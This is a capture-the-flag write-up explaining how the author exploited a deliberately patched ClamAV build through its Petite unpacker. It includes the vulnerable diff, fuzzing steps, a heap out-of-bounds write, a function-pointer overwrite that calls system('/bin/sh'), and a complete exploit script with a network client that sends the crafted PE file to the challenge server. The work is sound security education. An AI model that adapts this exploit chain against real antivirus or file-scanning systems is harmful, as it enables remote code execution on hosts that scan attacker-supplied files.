Writing Anti-Anti-Virus Exploit (AuViel

I played Hayyim CTF 2022 with keymoon, st98, and theoremoon. We solved all the pwn tasks and finished in 3rd place. *1

One of the pwn challenges was about exploiting antivirus software, which looked interesting. So, I started solving it after wiping out all the other challenges.

Fuzz ClamAV to spot the bug
Make a small Petite PE
Achieve arb-size heap oob write primitive
Overwrite a function pointer used by ClamAV

Introduction
TL;DR
Challenge
Fuzzing ClamAV
Making PE
- small PE
Making Petite
Writing Exploit


We're given a binary with its libraries, and a patch for it. The binary is ClamAV, an open source antivirus. The patch introduces a function named gift, which calls the system function with a meaningless command. The main part of the patch is the following:

diff -ru clamav/libclamav/petite.c clamav-ctf/libclamav/petite.c
--- clamav/libclamav/petite.c   2022-01-11 09:35:04.000000000 +0900
+++ clamav-ctf/libclamav/petite.c   2022-01-25 17:33:58.605682430 +0900
@@ -328,8 +328,8 @@
              */
 
             for (q = 0; q < sectcount; q++) {
-                if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
-                    continue;
+                /*if (!CLI_ISCONTAINED(sections[q].rva, sections[q].vsz, usects[j].rva, usects[j].vsz))
+                    continue;*/
                 if (!check4resources) {
                     usects[j].rva = sections[q].rva;
                     usects[j].rsz = thisrva - sections[q].rva + size;
@@ -365,10 +365,10 @@
              * func to get called instead... ehehe very smart ;)
              */
 
-            if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+            /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                 free(usects);
                 return 1;
-            }
+            }*/
 
             size--;
             *ddst++   = *ssrc++; /* eheh u C gurus gotta luv these monsters :P */
@@ -383,10 +383,10 @@
                     return 1;
                 }
                 if (!oob) {
-                    if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
+                    /*if (!CLI_ISCONTAINED(buf, bufsz, ssrc, 1) || !CLI_ISCONTAINED(buf, bufsz, ddst, 1)) {
                         free(usects);
                         return 1;
-                    }
+                    }*/
                     *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
                     size--;
                 } else {

The patch removes several bounds checks in a file named petite.c.
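To make the effect of the patch concrete, here is a minimal Python sketch of what a containment check of this kind does. The helper name is_contained and its exact conditions are my simplification of CLI_ISCONTAINED (an assumption, not a copy of ClamAV's macro), and the addresses are made up for illustration.

```python
def is_contained(buf_start: int, buf_size: int, ptr: int, size: int) -> bool:
    """Return True if [ptr, ptr + size) lies entirely inside the buffer.

    Simplified model of a bounds check such as CLI_ISCONTAINED (assumption).
    """
    if buf_size <= 0 or size <= 0 or size > buf_size:
        return False
    return buf_start <= ptr and ptr + size <= buf_start + buf_size


# Hypothetical addresses, for illustration only.
BUF, BUFSZ = 0x100000, 0x600
in_bounds = is_contained(BUF, BUFSZ, BUF + 0x10, 1)    # a normal access
below_buf = is_contained(BUF, BUFSZ, BUF - 0x3f70, 1)  # before the buffer
above_buf = is_contained(BUF, BUFSZ, BUF + BUFSZ, 1)   # one past the end
print(in_bounds, below_buf, above_buf)
```

With the checks commented out, the last two accesses are no longer rejected before the copy happens.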

Another piece of good news is that the target binary, clamscan, is built without PIE.

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    RUNPATH:  b'/home/auviel/clamav-0.104.2/build/libclamav:/home/auviel/clamav-0.104.2/build/libclammspack:'
    FORTIFY:  Enabled

Let's keep in mind that we can call the system function from PLT.

Since the CTF was almost over when I started this challenge, I wanted to know whether it was solvable within a few hours before actually writing the exploit. So, I used a fuzzer to check whether the bug could be triggered easily.

Instrumenting PUT

The first thing to do is to instrument the antivirus. The original ClamAV doesn't seem to support a CC option in its Makefile, so I passed CMAKE_C_COMPILER and CMAKE_CXX_COMPILER to cmake.

build$ cmake .. -D CMAKE_C_COMPILER=afl-gcc -D CMAKE_CXX_COMPILER=afl-g++
build$ make -j8

and it successfully compiled.

Preparing Seed

With great seeds comes great fuzzing.

Using a random file as the seed is pointless because it is unlikely to reach the patched code. We need a file that is likely to trigger the bug. The patched file is named petite.c, so I googled what "petite" is: Petite is a packer for 32-bit Windows executables. Keymoon found that the packer itself is packed with Petite, so I decided to use petite.exe as the seed file.

Running Fuzzer

I used fuzzuf to fuzz the target because I had already built it in my environment, but AFL should work just as well, of course.

There was a big problem with fuzzing ClamAV: clamscan loads the antivirus database every time it runs. This takes about 10 seconds, which makes fuzzing extremely slow. I found that I could pass the --database option to specify the database path, and it ran reasonably fast when I put only bytecode.cvd and freshclam.dat in the database directory. (Please tell me if you know a better way to fuzz slow-starting executables with AFL.)

Also, don't forget to set a memory limit, because ClamAV consumes a lot of memory.

fuzzuf afl -i input -o output --exec_memlimit 128 -- ./clamav/build/clamscan/clamscan --database=./db @@

After running the fuzzer for 3 or 4 minutes, it found some crashes. Yay!


Triaging

We need to check whether the crash is actually exploitable. Some bugs, such as assertion failures or NULL pointer dereferences, do crash the program but are usually not exploitable.

Let's check the crash files.

$ ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
Loading:     0s, ETA:   0s [========================>]       92/92 sigs       
Compiling:   0s, ETA:   0s [========================>]       40/40 tasks 

Segmentation fault

The dmesg output shows that it is not one of the trivial, definitely-unexploitable crashes.

[65033.884299] clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000]
[65033.884308] Code: 4c 24 08 48 89 44 24 10 48 c7 c1 bf 98 00 00 e8 be 7b 00 00 48 8b 44 24 10 48 8b 4c 24 08 48 8b 14 24 48 8d a4 24 98 00 00 00 <41> 0f b6 16 45 8d 4c 24 ff 4c 8d 40 01 49 83 c6 01 41 81 fc ff ff
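As a side note, the dmesg line can be decoded mechanically. The sketch below parses the line above and interprets the error value using the x86 page-fault error code bits (bit 0: page present, bit 1: write, bit 2: user mode). The function name decode_segfault and the regular expression are my own, not part of any tool.

```python
import re

DMESG = ("clamscan[267713]: segfault at 5555868bd760 ip 00007ffff7b2c260 "
         "sp 00007fffffff9a10 error 4 in libclamav.so.9.1.0[7ffff7764000+741000]")


def decode_segfault(line: str) -> dict:
    """Extract the fault address, the library offset of ip, and the error bits."""
    m = re.search(
        r"segfault at (\w+) ip (\w+) sp (\w+) error (\w+) in (\S+)\[(\w+)\+(\w+)\]",
        line,
    )
    if m is None:
        raise ValueError("not a segfault line")
    addr, ip, _sp, err, lib, base, _size = m.groups()
    err = int(err, 16)
    return {
        "fault_addr": int(addr, 16),
        "library": lib,
        "ip_offset": int(ip, 16) - int(base, 16),  # offset of the faulting code in the mapping
        "page_present": bool(err & 1),
        "is_write": bool(err & 2),
        "user_mode": bool(err & 4),
    }


info = decode_segfault(DMESG)
print(info["library"], hex(info["ip_offset"]), info)
```

Here the fault is a user-mode read of an unmapped page inside libclamav, which is consistent with a wild pointer rather than a NULL dereference or an abort.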

Let's debug it in gdb to confirm the exploitability.

$ gdb --args ./clamav/build/clamscan/clamscan --database=./db ./output/crashes/id\:000000*
pwndbg> run

[Figure: pwndbg screenshots of the crash]

The first thing we notice is that it crashed in the petite_inflate2x_1to9 function, which is exactly the function patched in this challenge. At the very least, we found a bug in the Petite analyzer.

The second thing to check is the exploitability. The program died at a movzx instruction as it tried to access an unmapped memory region: 0x5555868bd760. This code exists at L374 in libclamav/petite.c, which is right after the patched code.

            size--;
            *ddst++   = *ssrc++; 
            backbytes = 0;
            oldback   = 0;

It seems we found the intended bug. Still, we need to check how ddst and ssrc are calculated in the program above to see if this bug is likely exploitable.

The invalid pointer r14 is calculated at the following code:

[Figure: screenshots of the code that computes r14]

r14 is 0x31303330 and this is a value taken from a part of the PE.

$ hexdump -C output/crashes/id\:000000* | grep "30 33 30 31"
00006bb0  3c 06 03 55 1d 1f 04 35  30 33 30 31 a0 2f a0 2d  |<..U...50301./.-|
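A quick way to double-check that those four file bytes really are the register value is to decode them as a little-endian 32-bit integer. This is only a small sanity check using Python's struct module.

```python
import struct

raw = bytes.fromhex("30 33 30 31")     # the bytes matched by grep in the hexdump
value = struct.unpack("<I", raw)[0]    # little-endian 32-bit integer
print(hex(value), raw)
```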

The offset used to calculate ddst is also taken from the PE, meaning we have the following primitive.

some_heap_ptr[dst_offset] = some_heap_ptr[src_offset]

This suggests the bug is likely exploitable. (To be more precise, we also need to check how many times the bug can be triggered. I'll come back to this later.)

Reading the challenge code, it turned out I could not simply use the crash file for writing the exploit because of the following check in wrapper.py:

    if file_size > 10000 or file_size <= 0:
        print("invalid input\n")
        exit()

We need to make the exploit very small.

small PE

Fortunately I had written a template script to generate a small PE when I solved a challenge from Pwn2Win CTF 2021 and I used the script.

To reach the Petite parser, however, I had to fix some broken values in the PE, because ClamAV doesn't try to inflate a broken PE. The --debug option prints detailed messages about errors encountered while parsing the PE. I combined it with traditional print debugging to fix my PE.

Here is the code to generate a valid small PE with 2 sections.

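from ptrlib import *

num_sections = 2

pe  = b''

# DOS header
pe += b'MZ\0\0'            # e_magic
pe += b'\0' * 0x38
pe += p32(0x40)            # e_lfanew: file offset of the PE header

# COFF file header
pe += b'PE\0\0'            # Signature
pe += p16(0)               # Machine
pe += p16(num_sections)    # NumberOfSections
pe += p32(0)               # TimeDateStamp
pe += p32(0)               # PointerToSymbolTable
pe += p32(0)               # NumberOfSymbols
pe += p16(0xe0)            # SizeOfOptionalHeader
pe += p16(2)               # Characteristics

# Optional header (PE32)
pe += p16(0x010b)          # Magic
pe += p16(0)               # MajorLinkerVersion, MinorLinkerVersion
pe += p32(0)               # SizeOfCode
pe += p32(0)               # SizeOfInitializedData
pe += p32(0)               # SizeOfUninitializedData
pe += p32(0x5100)          # AddressOfEntryPoint
pe += p32(0)               # BaseOfCode
pe += p32(0)               # BaseOfData
pe += p32(0xcafe0000)      # ImageBase
pe += p32(0x1000)          # SectionAlignment
pe += p32(0x200)           # FileAlignment
pe += p16(0) * 6           # OS / image / subsystem versions
pe += p32(0)               # Win32VersionValue
pe += p32(0x1000)          # SizeOfImage
pe += p32(0)               # SizeOfHeaders
pe += p32(0)               # CheckSum
pe += p16(3)               # Subsystem
pe += p16(0)               # DllCharacteristics
pe += p32(1)               # SizeOfStackReserve
pe += p32(2)               # SizeOfStackCommit
pe += p32(3)               # SizeOfHeapReserve
pe += p32(4)               # SizeOfHeapCommit
pe += p32(0)               # LoaderFlags
pe += p32(0x10)            # NumberOfRvaAndSizes
pe += p32(0x400)           # DataDirectory[0].VirtualAddress
pe += p32(0x100)           # DataDirectory[0].Size
pe += p32(0)               # DataDirectory[1].VirtualAddress
pe += p32(0)               # DataDirectory[1].Size
pe += p32(0) * 28          # remaining 14 data directories

# Section header 1
pe += b'.AAAA\0\0\0'       # Name
pe += p32(0x1000)          # VirtualSize
pe += p32(0x4000)          # VirtualAddress
pe += p32(0x10)            # SizeOfRawData
pe += p32(0x400)           # PointerToRawData
pe += p32(0)               # PointerToRelocations
pe += p32(0)               # PointerToLinenumbers
pe += p16(0) * 2           # NumberOfRelocations, NumberOfLinenumbers
pe += p32(0)               # Characteristics

# Section header 2
pe += b'.BBBB\0\0\0'       # Name
pe += p32(0x1000)          # VirtualSize
pe += p32(0x5000)          # VirtualAddress
pe += p32(0x20)            # SizeOfRawData
pe += p32(0x500)           # PointerToRawData
pe += p32(0)               # PointerToRelocations
pe += p32(0)               # PointerToLinenumbers
pe += p16(0) * 2           # NumberOfRelocations, NumberOfLinenumbers
pe += p32(0)               # Characteristics
pe += b'\x00' * (0x400 - len(pe))  # pad the headers up to file offset 0x400

pe += b'A' * (0x500 - len(pe))     # raw data of .AAAA

pe += b'A' * (0x600 - len(pe))     # raw data of .BBBB


with open("sample.exe", "wb") as f:
    f.write(pe)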
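When hand-crafting headers like this, it helps to parse the file back and see which values a parser would read. Below is a minimal sketch of such a reader for PE32 files, based on the standard PE layout. The function name parse_pe_sections is mine, and it performs none of ClamAV's own sanity checks.

```python
import struct


def parse_pe_sections(pe: bytes):
    """Return (image_base, entry_point, sections) for a PE32 file.

    Each section is a tuple (name, virtual_size, rva, raw_size, raw_offset).
    """
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3c)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")

    coff = e_lfanew + 4                                    # COFF file header
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)

    opt = coff + 20                                        # optional header
    (magic,) = struct.unpack_from("<H", pe, opt)
    if magic != 0x10b:
        raise ValueError("not a PE32 optional header")
    (entry_point,) = struct.unpack_from("<I", pe, opt + 16)
    (image_base,) = struct.unpack_from("<I", pe, opt + 28)

    table = opt + opt_size                                 # section table
    sections = []
    for i in range(num_sections):
        name, vsz, rva, rsz, raw = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0"), vsz, rva, rsz, raw))
    return image_base, entry_point, sections
```

Calling parse_pe_sections(open("sample.exe", "rb").read()) on the generated file should list the two sections with the RVAs and raw offsets written by the script.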

The next thing to do is to make ClamAV recognize our PE as Petite-packed. Keymoon helped me figure out how ClamAV determines the packer.

ClamAV checks for packers in cli_scanpe, and the code that checks for the Petite packer starts at L4000.


The code is small. It checks for a mov instruction and its immediate operand at the entry point, which the packer probably uses to jump to a specific position in the unpacker.

    if (epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 1].rva + EC32(peinfo->pe_opt.opt32.ImageBase)) {
        if (peinfo->nsections < 2 || epbuff[0] != '\xb8' || (uint32_t)cli_readint32(epbuff + 1) != peinfo->sections[peinfo->nsections - 2].rva + EC32(peinfo->pe_opt.opt32.ImageBase))
            found = 0;
        else
            found = 1;
    }
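The condition above can be modelled in a few lines of Python. This is a sketch of my reading of the snippet only: the function name entry_matches_petite is hypothetical, and it returns a plain boolean instead of reproducing how ClamAV uses found afterwards.

```python
import struct


def entry_matches_petite(epbuff: bytes, section_rvas: list, image_base: int) -> bool:
    """True if the entry point is `mov eax, imm32` (opcode 0xb8) and imm32 is the
    virtual address of the last or the second-to-last section."""
    if len(epbuff) < 5 or epbuff[0] != 0xb8:
        return False
    (imm32,) = struct.unpack_from("<I", epbuff, 1)
    candidates = [section_rvas[-1]]
    if len(section_rvas) >= 2:
        candidates.append(section_rvas[-2])
    return any(imm32 == ((rva + image_base) & 0xffffffff) for rva in candidates)


# Values used in this write-up: ImageBase 0xcafe0000, sections at RVA 0x4000 and 0x5000.
stub = b"\xb8" + struct.pack("<I", 0xcafe0000 + 0x5000)
print(entry_matches_petite(stub, [0x4000, 0x5000], 0xcafe0000))
```

So placing these five bytes at the entry point is enough to satisfy this particular check.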

There are also other checks but they're just some sanity checks and we can pass them without any modifications. Finally petite_inflate2x_1to9 is called.


However, there is one more check to pass. There is a variable named srva, and we need to make it a non-zero, positive value.

    if (version == 2)
        packed = adjbuf + sections[sectcount - 1].rva + 0x1b8;
...
        srva = cli_readint32(packed);
...
        size = srva & 0x7fffffff;
        if (srva != size) { 
...

As you can see from the code above, this 32-bit value is read from offset 0x1b8 of the last section of the PE. This is the very value that caused the crash. srva must be followed by two more values: size and thisrva.

            size    = cli_readint32(packed + 4); 
            thisrva = cli_readint32(packed + 8);

Now we can write the vulnerability as

adjbuf[thisrva] = adjbuf[srva]
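To keep the three fields straight, here is a small sketch that parses them the way I understand the snippets above. The function name parse_packed_header and the dictionary keys are mine. It only models the branch where bit 31 of srva is clear, and the sample values are the ones used in the final exploit.

```python
import struct


def parse_packed_header(blob: bytes, offset: int = 0) -> dict:
    """Read srva, size and thisrva (three little-endian 32-bit values)."""
    srva, size, thisrva = struct.unpack_from("<III", blob, offset)
    if srva == 0:
        raise ValueError("srva must be non-zero")
    if srva & 0x80000000:
        raise ValueError("bit 31 of srva is set, so a different branch is taken")
    return {"src_rva": srva, "size": size, "dst_rva": thisrva}


header = struct.pack("<III", 0x5300, 0x40, 0x90)
fields = parse_packed_header(header)
print({k: hex(v) for k, v in fields.items()})
```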

The pointer adjbuf is defined at the beginning of the function:

    char *adjbuf     = buf - minrva;

This code looks weird because it's subtracting a value from a base pointer. buf is a buffer having the content of the sections of PE. minrva is the minimal RVA of all the sections.

[Figure: memory layout of adjbuf, buf, and the PE sections]

As shown in the figure above, the pointer adjbuf itself is invalid. It is indexed with an RVA so that the code can access the sections directly without converting the RVA. What scary code.
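The pointer arithmetic is easy to check with plain integers. In the sketch below the heap address of buf is hypothetical, and minrva is the RVA of the first section in my PE (0x4000). The helper names are made up for illustration.

```python
MASK64 = (1 << 64) - 1


def adjbuf_target(buf: int, minrva: int, rva: int) -> int:
    """Address reached by adjbuf[rva], where adjbuf = buf - minrva."""
    adjbuf = (buf - minrva) & MASK64
    return (adjbuf + rva) & MASK64


def offset_from_buf(minrva: int, rva: int) -> int:
    """Signed distance between adjbuf[rva] and the start of buf."""
    return rva - minrva


BUF = 0x100000      # hypothetical heap address of buf
MINRVA = 0x4000     # lowest section RVA in the PE above

for rva in (0x4000, 0x5000, 0x90):
    print(hex(rva), hex(adjbuf_target(BUF, MINRVA, rva)), offset_from_buf(MINRVA, rva))
```

An RVA inside a section lands inside buf, while any RVA smaller than minrva lands before buf on the heap.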

Time to write exploit :)

Making Primitive

So, adjbuf points to an invalid heap region before the actual section data. This means we can write out of bounds not only in the positive direction but also at (small) negative offsets.

Anyway, there is still one important thing we need to test: How many bytes can we overwrite?

This is a part of the code around the vulnerability:

...
            size--;
            *ddst++   = *ssrc++; 
            backbytes = 0;
            oldback   = 0;

            while (size > 0) {
                oob = doubledl(&ssrc, &mydl, buf, bufsz);
                if (oob == -1) {
                    free(usects);
                    return 1;
                }
                if (!oob) {
                    *ddst++ = (char)((*ssrc++) ^ (size & 0xff));
                    size--;
                } else {
...

As I explained, we have already confirmed the first *ddst++ = *ssrc++; can read/write out-of-bounds. However, this is just 1-byte write and we need more.

After the first write, there is a while-loop that looks like iterating size times. We want to call this code in the while-loop to achieve OOB write with arbitrary size.

*ddst++ = (char)((*ssrc++) ^ (size & 0xff));

For this we have to pass the check:

                oob = doubledl(&ssrc, &mydl, buf, bufsz);
                if (oob == -1) {
                    free(usects);
                    return 1;
                }
                if (!oob) {
...

The question is what is doubledl?

This function is defined at the beginning of petite.c as shown below:

static int doubledl(char **scur, uint8_t *mydlptr, char *buffer, uint32_t buffersize)
{
    unsigned char mydl  = *mydlptr;
    unsigned char olddl = mydl;

    mydl *= 2;
    if (!(olddl & 0x7f)) {
        if (*scur < buffer || *scur >= buffer + buffersize - 1)
            return -1;
        olddl = **scur;
        mydl  = olddl * 2 + 1;
        *scur = *scur + 1;
    }
    *mydlptr = mydl;
    return (olddl >> 7) & 1;
}

I don't fully understand what this function does, but two things are clear:

It must not return -1
We want it to return 0, because the copy we are after sits in the if (!oob) branch

The code below checks if ssrc is within the section being parsed.

if (*scur < buffer || *scur >= buffer + buffersize - 1)
    return -1;

It means we cannot read data out of bounds. This is not fatal, because we still have the OOB write.

Debugging the function dynamically, I confirmed that oob is 0 for my input. So, we can reach the following code:

*ddst++ = (char)((*ssrc++) ^ (size & 0xff));
size--;
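Porting doubledl to Python makes its behaviour easier to see: as far as I can tell it acts as a bit reader that fetches one control byte from the stream and then hands out its bits from the most significant one, one bit per call. The port below drops the bounds check and assumes mydl starts at 0 (the initial value is not shown in the snippets above). read_bits is a helper of my own.

```python
def doubledl(stream: bytes, pos: int, mydl: int):
    """Python port of doubledl without the bounds check.

    Returns (bit, new_pos, new_mydl).
    """
    olddl = mydl
    mydl = (mydl * 2) & 0xff
    if not (olddl & 0x7f):
        # No pending bits left: fetch a new control byte from the stream.
        olddl = stream[pos]
        mydl = (olddl * 2 + 1) & 0xff
        pos += 1
    return (olddl >> 7) & 1, pos, mydl


def read_bits(stream: bytes, count: int):
    """Call doubledl `count` times and collect the returned bits."""
    pos, mydl, bits = 0, 0, []
    for _ in range(count):
        bit, pos, mydl = doubledl(stream, pos, mydl)
        bits.append(bit)
    return bits, pos


bits, consumed = read_bits(b"\x00\xa0", 16)
print(bits, consumed)
```

A zero control byte therefore gives eight consecutive 0 results, which is why one zero byte per eight copied bytes keeps the loop on the if (!oob) path.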

Since the packer applies a sort of obfuscation, I wrote an encoder for it.

def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output
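To convince myself that the encoder matches the unpacking loop, the literal-copy path of the loop can be simulated in Python and checked with a round trip. This is a simplified model: the back-reference branch is not implemented, the bounds check in doubledl is dropped, and mydl is assumed to start at 0. The name decode_literals is mine.

```python
def encode(data: bytes, size: int) -> bytes:
    """Same logic as the encoder above: first byte raw, the rest XORed with the
    running size, plus a zero control byte before every group of 8 literals."""
    out = bytearray()
    for i, c in enumerate(data):
        out.append(c if i == 0 else c ^ (size & 0xff))
        if i % 8 == 0:
            out.append(0)
        size -= 1
    return bytes(out)


def doubledl(stream: bytes, pos: int, mydl: int):
    """Port of doubledl without the bounds check."""
    olddl = mydl
    mydl = (mydl * 2) & 0xff
    if not (olddl & 0x7f):
        olddl = stream[pos]
        mydl = (olddl * 2 + 1) & 0xff
        pos += 1
    return (olddl >> 7) & 1, pos, mydl


def decode_literals(stream: bytes, size: int) -> bytes:
    """Model of the unpacking loop, restricted to the if (!oob) branch."""
    out = bytearray()
    pos, mydl = 0, 0
    size -= 1
    out.append(stream[pos])          # *ddst++ = *ssrc++;
    pos += 1
    while size > 0:
        bit, pos, mydl = doubledl(stream, pos, mydl)
        if bit:
            raise ValueError("back-reference branch is not modelled")
        out.append(stream[pos] ^ (size & 0xff))
        pos += 1
        size -= 1
    return bytes(out)


payload = bytes(range(0x40))
decoded = decode_literals(encode(payload, len(payload)), len(payload))
print(decoded == payload)
```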

Now we can write as much data as we want, as long as the file size limit allows.

Where to Write

The last thing we need to do is finding a good target to overwrite.

First, the following data attracted my attention:

pwndbg> x/32xg 0x10647f0 - 0x1010 - 0x100
0x10636e0:      0x0000400000000000      0x0000040000001000
0x10636f0:      0x0000500000000100      0x0000060000001000
0x1063700:      0x0000000000000400      0x0000100000005000
0x1063710:      0x0000040000000600      0x0000000000000061
0x1063720:      0x000000000067ed80      0x000000000067e8a0
0x1063730:      0x0000000000000000      0x0000000000000000
0x1063740:      0x0000000000000000      0x0000000000000000
0x1063750:      0x0000000000000000      0x0000000000000000
0x1063760:      0x0000000000000000      0x0000000000000000
0x1063770:      0x0000000000000060      0x0000000000000070
0x1063780:      0x00000000004cb250      0x0000000000424010
0x1063790:      0x0000000000000000      0x0000000000000000
0x10637a0:      0x0000000000000000      0x0000000000000000
0x10637b0:      0x0000000000000000      0x0000000000000000
0x10637c0:      0x0000000000000000      0x0000000000000000
0x10637d0:      0x0000000000000000      0x0000000000000000

The chunk at 0x1063780 is obviously linked to tcache. I thought of overwriting the link with some GOT address and overwrite GOT. *2

However, when I checked it on my host machine and in docker, the heap layout changed drastically. It also changes when the virus database changes. So, the exploit would be extremely unstable even if it worked.

After inspecting the heap further, I found the following data when I gave 2 identical PE files to ClamAV:

pwndbg> x/32xg 0x1063630 - 0x4000
0x105f630:      0x00000000000003fe      0x0000000000000000
0x105f640:      0x0000000000000000      0x07560707005d0000
0x105f650:      0x0000000000480079      0x0000000000000071
0x105f660:      0x00007ffff7dee8f0      0x00007ffff7dee900
0x105f670:      0x0000000000000000      0x0000000000000000
0x105f680:      0x0000000000000000      0x0000000000000000
0x105f690:      0x0000000000000000      0x0000000000000000
0x105f6a0:      0x0000000000000000      0xffffffffffffffff
0x105f6b0:      0x000186a001312d00      0x00000000000007d0
0x105f6c0:      0x0000000001084730      0x0000000000000131
0x105f6d0:      0x00007ffff7dee8f0      0x00007ffff7dee900
0x105f6e0:      0x0000000000000000      0x00007ffff76fbbc0
0x105f6f0:      0x0000000000000000      0x0000000000000000
0x105f700:      0x0000000000000000      0x0000000000000000
0x105f710:      0x0000000000000000      0x0000000000000122
0x105f720:      0x0000042850435245      0x0000000000000428

Pointers such as 0x00007ffff7dee8f0 and 0x00007ffff7dee900 point into a machine code region, which means they are function pointers.

I don't know which functions they are or who calls them and when, but the chunks are not freed, as you can see, so they are likely to be called. I wrote an exploit that overwrites them with 0xffffffffdeadbeef and 0xffffffffcafebabe and ran it.

*RAX  0x0
*RBX  0x7fffab372bf8 ◂— 0x0
*RCX  0x7
*RDX  0x7ffff7d5cbe0 —▸ 0x10e9010 ◂— 0x20 /* ' ' */
*RDI  0x105f660 ◂— 0xffffffffdeadbeef
*RSI  0x0
*R8   0x7
*R9   0x7fffffffc3e0 ◂— 0x0
*R10  0xfffffffffffff103
*R11  0x7ffff76865e0 ◂— endbr64 
*R12  0x7fffab372bd8 ◂— 0x0
*R13  0x73
*R14  0x194
*R15  0x72
*RBP  0xa
*RSP  0x7fffffffc8c8 —▸ 0x7ffff7def2ea ◂— mov    qword ptr [rbx + 8], 0
*RIP  0xffffffffcafebabe

Yay!

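As you can see, the second function pointer is called with a pointer to the struct as the first argument. Therefore, if we put "/bin/sh\0" at the start of the struct and the address of system in the second slot, we can call system("/bin/sh\0");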
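The data to write is therefore a 16-byte slot: the command string where the first pointer was, followed by the address of system where the second pointer was. Repeating the slot gives some slack when the exact position of the struct is uncertain. A minimal sketch with the standard struct module follows. SYSTEM_PLT is a hypothetical placeholder (the real value comes from the clamscan binary), and build_spray is a name of my own.

```python
import struct

SYSTEM_PLT = 0x401234  # hypothetical address, NOT the real PLT entry


def build_spray(size: int, system_addr: int) -> bytes:
    """Repeat the 16-byte slot ["/bin/sh\\0"][system] to fill `size` bytes."""
    slot = b"/bin/sh\0" + struct.pack("<Q", system_addr)
    return slot * (size // len(slot))


payload = build_spray(0x40, SYSTEM_PLT)
print(len(payload), payload[:16])
```

Every 0x10-byte slot of the payload then looks like a struct whose second field is system and whose first bytes are the command string.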

Final Exploit

The offset to the function pointer still differs with the environment, the database, and so on. However, it at least seems to be somewhere around there.

I shifted the offset by 0x10 bytes on each attempt, and my exploit worked at 0x90 on the remote.

from ptrlib import *

elf = ELF("share/clamscan")

num_sections = 2

pe  = b''

pe += b'MZ\0\0'
pe += b'\0' * 0x38
pe += p32(0x40) 

pe += b'PE\0\0'
pe += p16(0) 
pe += p16(num_sections) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p16(0xe0) 
pe += p16(2) 

pe += p16(0x010b) 
pe += p16(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0x5000) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0xcafe0000) 
pe += p32(0x1000) 
pe += p32(0x200) 
pe += p16(0) * 6 
pe += p32(0) 
pe += p32(0x1000) 
pe += p32(0) 
pe += p32(0) 
pe += p16(3) 
pe += p16(0) 
pe += p32(1) 
pe += p32(2) 
pe += p32(3) 
pe += p32(4) 
pe += p32(0) 
pe += p32(0x10) 
pe += p32(0x400) 
pe += p32(0x100) 
pe += p32(0) 
pe += p32(0) 
pe += p32(0) * 28

pe += b'.AAAA\0\0\0'
pe += p32(0x1000) 
pe += p32(0x4000) 
pe += p32(0x100)  
pe += p32(0x400)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 

pe += b'.BBBB\0\0\0'
pe += p32(0x1000) 
pe += p32(0x5000) 
pe += p32(0x5000) 
pe += p32(0x600)  
pe += p32(0) 
pe += p32(0) 
pe += p16(0) * 2
pe += p32(0) 
pe += b'\x00' * (0x400 - len(pe))

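pe += b'C' * (0x600 - len(pe))   # raw data of .AAAA

# Raw data of .BBBB (file offset 0x600, RVA 0x5000): fake Petite entry stub
pe += b'\xb8'                    # mov eax, imm32
pe += p32(0xcafe5000)            # ImageBase + RVA of the last section
pe += b'A' * (0x1b8 - 5)         # pad up to offset 0x1b8 of the last section

size = 0x40

pe += p32(0x5300)                # srva: RVA of the encoded data (file offset 0x900)
pe += p32(size)                  # size: number of bytes to write
pe += p32(0x90)                  # thisrva: destination, used as adjbuf[thisrva]
pe += p32(0xdeadbeef)
pe += p32(0)
pe += p32(0)
pe += p32(0)
pe += b'B' * (0x900 - len(pe))   # pad so that the encoded data starts at RVA 0x5300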


def encode(data, size):
    output = b''
    i = 0
    for c in data:
        if i == 0:
            output += bytes([ c ])
        else:
            output += bytes([ c ^ (size & 0xff) ])
        if i % 8 == 0:
            output += bytes([0])
        i += 1
        size -= 1
    return output

data  = b'/bin/sh\0'
data += p64(elf.plt("system"))
data *= (size // 0x10)
pe += encode(data, size)
pe += b'B' * (0x2000 - len(pe))

print(len(pe))
with open("sample.exe", "wb") as f:
    f.write(pe)

from ptrlib import *

fs = [
    "sample.exe",
    "sample.exe",
]


sock = Socket("nc 141.164.48.191 10000")

sock.sendlineafter(": ", str(len(fs)))
for f in fs:
    buf = open(f, "rb").read()
    assert len(buf) < 10000
    sock.sendlineafter(": ", str(len(buf)))
    sock.sendafter(": ", buf)

sock.interactive()

This challenge ended with 1 solve.